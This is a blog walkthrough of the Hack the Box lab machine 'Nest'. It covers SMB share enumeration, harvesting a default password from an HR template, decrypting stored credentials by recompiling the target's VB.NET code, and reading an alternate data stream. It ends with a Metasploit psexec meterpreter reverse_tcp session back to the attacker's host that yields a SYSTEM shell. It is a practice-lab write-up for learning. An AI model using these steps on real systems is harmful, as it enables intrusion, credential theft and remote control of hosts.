HTB Nest Walkthrough

HTB Nest Walkthrough (nanobyte)

Jul 30, 2020 | nanobyte

This is one of my favorite Hack the Box machines, throughout my time completing them! I absolutely enjoyed every minute of this box.

My first NMAP scan, running with multiple flags, failed. I performed a simple nmap scan, and it returned only one port open:

123456789nmap 10.10.10.178                                                                                     Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-28 09:25 CST                                                      Nmap scan report for 10.10.10.178                                                                                    Host is up (0.043s latency).                                                                                         Not shown: 999 filtered ports                                                                                        PORT    STATE SERVICE                                                                                                445/tcp open  microsoft-ds                                                                                                                                                                                                                Nmap done: 1 IP address (1 host up) scanned in 5.41 seconds

In the above, with port 445 open, I then ran a scan against SMB. Server Message Block (also known as Samba) is a way for Windows to share files, printers, serial ports and communications abstractions such as named pipes and mail slots between computers.

123456789101112smbclient -L //10.10.10.178Enter WORKGROUP\root's password:         Sharename       Type      Comment        ---------       ----      -------        ADMIN$          Disk      Remote Admin        C$              Disk      Default share        Data            Disk              IPC$            IPC       Remote IPC        Secure$         Disk              Users           Disk      SMB1 disabled -- no workgroup available

The smbclient command showed that there were several network shares. Smbclient is a tool used for Samba, providing a ftp-like experience for users. I went through and connected to each, and found that I was able to login and find possible Usernames in the Users share. I took note of this, as this information is sure to come up later for this box:

12345678910111213smbclient \\\\10.10.10.178\\UsersEnter WORKGROUP\root's password: smb: \> dir  .                                   D        0  Sat Jan 25 17:04:21 2020  ..                                  D        0  Sat Jan 25 17:04:21 2020  Administrator                       D        0  Fri Aug  9 10:08:23 2019  C.Smith                             D        0  Sun Jan 26 01:21:44 2020  L.Frost                             D        0  Thu Aug  8 12:03:01 2019  R.Thompson                          D        0  Thu Aug  8 12:02:50 2019  TempUser                            D        0  Wed Aug  7 17:55:56 2019                10485247 blocks of size 4096. 6449754 blocks available

I did attempt to access the user share listed, but access was denied for each of the directories. Continuing my enumeration of the network shares, I connected to Data, and found I could login to the Shared directory:

123456789101112131415161718192021smbclient \\\\10.10.10.178\\DataEnter WORKGROUP\root's password: Try "help" to get a list of possible commands.smb: \> dir  .                                   D        0  Wed Aug  7 17:53:46 2019  ..                                  D        0  Wed Aug  7 17:53:46 2019  IT                                  D        0  Wed Aug  7 17:58:07 2019  Production                          D        0  Mon Aug  5 16:53:38 2019  Reports                             D        0  Mon Aug  5 16:53:44 2019  Shared                              D        0  Wed Aug  7 14:07:51 2019                10485247 blocks of size 4096. 6449754 blocks availablesmb: \Reports\> cd ..\Sharedsmb: \Shared\> dir  .                                   D        0  Wed Aug  7 14:07:51 2019  ..                                  D        0  Wed Aug  7 14:07:51 2019  Maintenance                         D        0  Wed Aug  7 14:07:32 2019  Templates                           D        0  Wed Aug  7 14:08:07 2019                10485247 blocks of size 4096. 6449754 blocks available

In this directory, I found a file, Maintenance Alerts.txt. I used the get command to downlaod the file to my local box, and on my Kali Linux viewed the file:

12345678910111213smb: \Shared\Maintenance\> dir  .                                   D        0  Wed Aug  7 14:07:32 2019  ..                                  D        0  Wed Aug  7 14:07:32 2019  Maintenance Alerts.txt              A       48  Mon Aug  5 18:01:44 2019                10485247 blocks of size 4096. 6449754 blocks available                smb: \Shared\Maintenance\> get "Maintenance Alerts.txt"getting file \Shared\Maintenance\Maintenance Alerts.txt of size 48 as Maintenance Alerts.txt (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)root@bhax0r:~# cat 'Maintenance Alerts.txt'There is currently no scheduled maintenance work

However, still nothing! I then went up one directory, and logged into the Templates directory and found another file, Welcome Email.txt. This sounded promising:

1234567891011121314151617181920212223242526smb: \Shared\Templates\HR\> dir  .                                   D        0  Wed Aug  7 14:08:01 2019  ..                                  D        0  Wed Aug  7 14:08:01 2019  Welcome Email.txt                   A      425  Wed Aug  7 17:55:36 2019                10485247 blocks of size 4096. 6449754 blocks availablesmb: \Shared\Templates\HR\> get "Welcome Email.txt"getting file \Shared\Templates\HR\Welcome Email.txt of size 425 as Welcome Email.txt (2.4 KiloBytes/sec) (average 0.9 KiloBytes/sec)root@hax0r:~# cat 'Welcome Email.txt' We would like to extend a warm welcome to our newest member of staff, <FIRSTNAME> <SURNAME>You will find your home folder in the following location: \\HTB-NEST\Users\<USERNAME>If you have any issues accessing specific services or workstations, please inform the IT department and use the credentials below until all systems have been set up for you.Username: TempUserPassword: welcome2019Thank you

And I found a possible set of credentials, tempuser:welcome2019! Noting the Users directory earlier, I logged back in with these credentials to that network share:

1234567891011121314151617smbclient \\\\10.10.10.178\\Users -U TempUserEnter WORKGROUP\TempUser's password: Try "help" to get a list of possible commands.smb: \> cd TempUsersmb: \TempUser\> dir  .                                   D        0  Wed Aug  7 17:55:56 2019  ..                                  D        0  Wed Aug  7 17:55:56 2019  New Text Document.txt               A        0  Wed Aug  7 17:55:56 2019                10485247 blocks of size 4096. 6449754 blocks available                smb: \TempUser\> get "New Text Document.txt"getting file \TempUser\New Text Document.txt of size 0 as New Text Document.txt (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)root@hax0r:~# cat 'New Text Document.txt' 

However, this did not have any further information for me. I then attempted to login to the Users share with the other usernames, using the same password (users don’t always change default passwords) but this approach also did not work. So, I moved on and used these credentials agaisnt other shares. I did find that it allowed me into Secure$:

123456789101112smbclient \\\\10.10.10.178\\Secure$ -U TempUserEnter WORKGROUP\TempUser's password: Try "help" to get a list of possible commands.smb: \> dir  .                                   D        0  Wed Aug  7 18:08:12 2019  ..                                  D        0  Wed Aug  7 18:08:12 2019  Finance                             D        0  Wed Aug  7 14:40:13 2019  HR                                  D        0  Wed Aug  7 18:08:11 2019  IT                                  D        0  Thu Aug  8 05:59:25 2019                10485247 blocks of size 4096. 6449738 blocks available 

But, there was nothing within that network share that I could use to my advantage. Moving on, I was able to log into the Data share with the tempuser credentials. I was able to find two interesting files in this share, RU_config.xml and config.xml:

1234567891011121314151617 smb: \IT\Configs\RU Scanner\> ls  .                                   D        0  Wed Aug  7 15:01:13 2019  ..                                  D        0  Wed Aug  7 15:01:13 2019  RU_config.xml                       A      270  Thu Aug  8 14:49:37 2019                10485247 blocks of size 4096. 6449935 blocks availablesmb: \IT\Configs\RU Scanner\> get RU_config.xml getting file \IT\Configs\RU Scanner\RU_config.xml of size 270 as RU_config.xml (1.5 KiloBytes/sec) (average 17.6 KiloBytes/sec)root@hax0r:~# cat RU_config.xml                                                                                                                                                                                                           <?xml version="1.0"?>                                                                                                                                                                                                                      <ConfigFile xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">        <Port>389</Port>                                                                                                                                                                                                                           <Username>c.smith</Username>                                                                                         <Password>fTEzAfYDoz1YzkqhQkH6GQFYKp1XY5hm7bjOP86yYxE=</Password></ConfigFile>
12345678910111213141516171819smb: \IT\Configs\NotepadPlusPlus\> ls  .                                   D        0  Wed Aug  7 14:31:37 2019  ..                                  D        0  Wed Aug  7 14:31:37 2019  config.xml                          A     6451  Wed Aug  7 18:01:25 2019  shortcuts.xml                       A     2108  Wed Aug  7 14:30:27 2019                10485247 blocks of size 4096. 6449935 blocks availablesmb: \IT\Configs\NotepadPlusPlus\> get config.xml getting file \IT\Configs\NotepadPlusPlus\config.xml of size 6451 as config.xml (37.5 KiloBytes/sec) (average 23.4 KiloBytes/sec)root@hax0r:~# cat config.xml...<History nbMaxFile="15" inSubMenu="no" customLength="-1">        <File filename="C:\windows\System32\drivers\etc\hosts" />        <File filename="\\HTB-NEST\Secure$\IT\Carl\Temp.txt" />        <File filename="C:\Users\C.Smith\Desktop\todo.txt" />    </History>...

Neither of these looked like much at first, but there is relevant and important information. FIrst off, we have a username and password from the RU_config.xml. The second can be easily missed, and this is the second File filename variable in config.xml. I can see that in the network share Secure$, there is a Carl directory within the IT directory. In the RU_config.xml, there is a c.smith password, can this be Carl!?

I logged in and attempted to see if I could get to the Carl directory:

123456789101112131415161718192021smbclient \\\\10.10.10.178\\Secure$ -U TempUser                                                       Enter WORKGROUP\TempUser's password: welcome2019Try "help" to get a list of possible commands.                                                                       smb: \> dir                                                                                                            .                                   D        0  Wed Aug  7 18:08:12 2019  ..                                  D        0  Wed Aug  7 18:08:12 2019                                             Finance                             D        0  Wed Aug  7 14:40:13 2019  HR                                  D        0  Wed Aug  7 18:08:11 2019                                                                                                                                                                   IT                                  D        0  Thu Aug  8 05:59:25 2019                                                                                                                                                  10485247 blocks of size 4096. 6449738 blocks available                                               smb: \> cd IT                                                                                                        smb: \IT\> dir                                                                                                       NT_STATUS_ACCESS_DENIED listing \IT\*                                                                                smb: \IT\> cd Carl                                                                                                   smb: \IT\Carl\> dir                                                                                                    .                                   D        0  Wed Aug  7 14:42:14 2019  ..                                  D        0  Wed Aug  7 14:42:14 2019  Docs                                D        0  Wed Aug  7 14:44:00 2019  Reports                             D        0  Tue Aug  6 08:45:40 2019  VB Projects                         D        0  Tue Aug  6 09:41:55 2019

And that worked! Note above, that when I was in the Secure$\IT directory, I could not list the contents. However, I could still change into the Carl directory. Awesome! Enumerating these files, I found a RUScanner in VB Projects direcory:

1234567891011121314  smb: \IT\Carl\VB Projects\WIP\RU\RUScanner\> dir  .                                   D        0  Wed Aug  7 17:05:54 2019  ..                                  D        0  Wed Aug  7 17:05:54 2019  bin                                 D        0  Wed Aug  7 15:00:11 2019  ConfigFile.vb                       A      772  Wed Aug  7 17:05:09 2019  Module1.vb                          A      279  Wed Aug  7 17:05:44 2019  My Project                          D        0  Wed Aug  7 15:00:11 2019  obj                                 D        0  Wed Aug  7 15:00:11 2019  RU Scanner.vbproj                   A     4828  Fri Aug  9 10:37:51 2019  RU Scanner.vbproj.user              A      143  Tue Aug  6 07:55:27 2019  SsoIntegration.vb                   A      133  Wed Aug  7 17:05:58 2019  Utils.vb                            A     4888  Wed Aug  7 14:49:35 2019                10485247 blocks of size 4096. 6449951 blocks available'

Looking at the Utils.vb file, there are encrypting and decrypting functions. Looking at how these functions work, there is reference to symmetric key creation, using Rfc2898DeriveBytes. Instead of trying to break this encryption, I took the complete file structure, and copied to a Windows machine. Once I had it locally, I was able to compile the code using Visual Studio.

Once compiled and I attempted to run the file, there was an error message:

1Unhandled Exception: System.IO.FileNotFoundException: Could not find file 'C:\Users\adalzell\Desktop\Nest\RUScanner\bin\Debug\RU_Config.xml'

Having RU_config.xml file, which contains the hash string that looked like base 64, I placed that file into the directory, and when I ran it, the program ran without any exception errors. I then placed a single line of code to write to console the Plain Text in the Utils.vb decrypt function:

12345Public Shared Function Decrypt(ByVal cipherText As String, _...         Console.WriteLine(plainText)        Return plainText...

And with that, when I compiled the code again, I could see the plain text password:

12\RUScanner\bin\Debug>DbPof.exexRxRxPANCAK3SxRxRx

Now, I am able to connect to the Users share and own user:

1234567891011121314151617smbclient \\\\10.10.10.178\\Users -U C.SmithEnter WORKGROUP\C.Smith's password: xRxRxPANCAK3SxRxRxsmb: \> cd C.Smithsmb: \C.Smith\> ls  .                                   D        0  Sun Jan 26 01:21:44 2020  ..                                  D        0  Sun Jan 26 01:21:44 2020  HQK Reporting                       D        0  Thu Aug  8 18:06:17 2019  user.txt                            A       32  Thu Aug  8 18:05:24 2019                10485247 blocks of size 4096. 6449757 blocks availablesmb: \C.Smith\> get user.txtgetting file \C.Smith\user.txt of size 32 as user.txt (0.2 KiloBytes/sec) (average 0.2 KiloBytes/sec)root@hax0r:~# cat user.txt xxxxxxxxxxxxxxx4fd827e05f426e987

Now to move on to own root. I looked in the HQK Reporting directory, and found a password file:

12345678smb: \C.Smith\HQK Reporting\> ls  .                                   D        0  Thu Aug  8 18:06:17 2019  ..                                  D        0  Thu Aug  8 18:06:17 2019  AD Integration Module               D        0  Fri Aug  9 07:18:42 2019  Debug Mode Password.txt             A        0  Thu Aug  8 18:08:17 2019  HQK_Config_Backup.xml               A      249  Thu Aug  8 18:09:05 2019                10485247 blocks of size 4096. 6449725 blocks available

But, it was empty. That would have been to easy! However, looking at the file attributes, there is a stream associated to it, so I copied of the Alternate Data Stream (ADS) to get the password file:

123456789101112131415smb: \C.Smith\HQK Reporting\> allinfo "Debug Mode Password.txt"altname: DEBUGM~1.TXTcreate_time:    Thu Aug  8 06:06:12 PM 2019 CDTaccess_time:    Thu Aug  8 06:06:12 PM 2019 CDTwrite_time:     Thu Aug  8 06:08:17 PM 2019 CDTchange_time:    Thu Aug  8 06:08:17 PM 2019 CDTattributes: A (20)stream: [::$DATA], 0 bytesstream: [:Password:$DATA], 15 bytessmb: \C.Smith\HQK Reporting\> get "Debug Mode Password.txt:Password"root@hax0r:~# cat "/root/Debug Mode Password.txt:Password" WBQ201953D8w 

With this password, I can telnet into the box and enable Debug:

12345678910telnet 10.10.10.178 4386Trying 10.10.10.178...Connected to 10.10.10.178.Escape character is '^]'.HQK Reporting Service V1.2>debug WBQ201953D8wDebug mode enabled. Use the HELP command to view additional commands that are now available

Still connected with this telnet session, I enumerated and going up one directory, in the LDAP directory, I found a config file:

1234567891011121314151617>list  Use the query ID numbers below with the RUNQUERY command and the directory names with the SETDIR command QUERY FILES IN CURRENT DIRECTORY[1]   HqkLdap.exe[2]   Ldap.confCurrent Directory: LDAP>showquery 2Domain=nest.localPort=389BaseOu=OU=WBQ Users,OU=Production,DC=nest,DC=localUser=AdministratorPassword=yyEq0Uvvhq2uQOcWG8peLoeRQehqip/fKdeG/kjEVb4=

Using the RU_config.xml I attempted to decrypt returned a padding error. Looking further into the KqdLdap.exe, I found the following code in the CR function:

12345678' HqkLdap.CR' Token: 0x06000012 RID: 18 RVA: 0x00002278 File Offset: 0x00000678Public Shared Function DS(EncryptedString As String) As String	If String.IsNullOrEmpty(EncryptedString) Then		Return String.Empty	End If	Return CR.RD(EncryptedString, "667912", "1313Rf99", 3, "1L1SA61493DRV53Z", 256)End Function

This is a different set of encryption, different IV, string, and iteration. So, I placed this into the Decryption function of DbPof.exe, and with the administrator hash in the RU_config.xml file, I reran the DbProf.exe program from command prompt, and got the administrator password!

12DbPof.exeXtH4nkS4Pl4y1nGX

I connected to SMB Share, but there was a shortcut link to the admins desktop. This was no good. So, I used metasploit (after multiple failed attempts with evil-winrm, impacket psexec.py, and winexec) psexec with reverse_tcp payload:

1234567891011121314151617181920212223242526272829303132333435363738394041424344msf5 > use exploit/windows/smb/psexecmsf5 exploit(windows/smb/psexec) > set payload windows/meterpreter/reverse_tcppayload => windows/meterpreter/reverse_tcp        msf5 exploit(windows/smb/psexec) > set LHOST 10.10.14.13LHOST => 10.10.14.13msf5 exploit(windows/smb/psexec) > set LPORT 4538LPORT => 4538msf5 exploit(windows/smb/psexec) > set RHOSTS 10.10.10.178RHOSTS => 10.10.10.178msf5 exploit(windows/smb/psexec) > set SMBUserSMBUser => msf5 exploit(windows/smb/psexec) > set SMBUser AdministratorSMBUser => Administratormsf5 exploit(windows/smb/psexec) > set SMBPass XtH4nkS4Pl4y1nGXSMBPass => XtH4nkS4Pl4y1nGXmsf5 exploit(windows/smb/psexec) > exploit[*] Started reverse TCP handler on 10.10.14.13:4538 [*] 10.10.10.178:445 - Connecting to the server...[*] 10.10.10.178:445 - Authenticating to 10.10.10.178:445 as user 'Administrator'...[*] 10.10.10.178:445 - Selecting PowerShell target[*] 10.10.10.178:445 - Executing the payload...[+] 10.10.10.178:445 - Service start timed out, OK if running a command or non-service executable...[*] Sending stage (180291 bytes) to 10.10.10.178[*] Meterpreter session 1 opened (10.10.14.13:4538 -> 10.10.10.178:49157) at 2020-01-29 14:28:29 -0600meterpreter > shellProcess 1456 created.Channel 1 created.Microsoft Windows [Version 6.1.7601]Copyright (c) 2009 Microsoft Corporation.  All rights reserved.C:\Windows\system32>whoamiwhoamint authority\systemC:\Windows\system32>cd C:\users\administrator\desktopcd C:\users\administrator\desktopC:\Users\Administrator\Desktop>more root.txtmore root.txtxxxxxxxxxxxxxxxxxxx08a42f0b94b878c41

And rooted this box! The name, Nest, really fits this complex set of steps, nesting each step to proceed. Thanks for reading!

Last updated